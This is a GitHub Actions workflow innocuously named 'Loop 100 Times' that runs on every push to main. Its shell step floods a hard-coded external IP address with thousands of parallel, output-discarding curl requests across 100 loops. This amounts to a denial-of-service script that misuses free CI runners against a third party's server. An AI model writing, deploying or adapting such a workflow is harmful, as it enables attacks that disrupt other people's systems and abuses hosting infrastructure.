name: Loop 100 Times dcae3ef7-8ec3-4f25-a662-7881228b9fb7

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times dcae3ef7-8ec3-4f25-a662-7881228b9fb7
        id: loop_step
        run: |
          counter=0
          max_loops=50
          target="http://51.15.25.108"
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks $target 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks $target 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




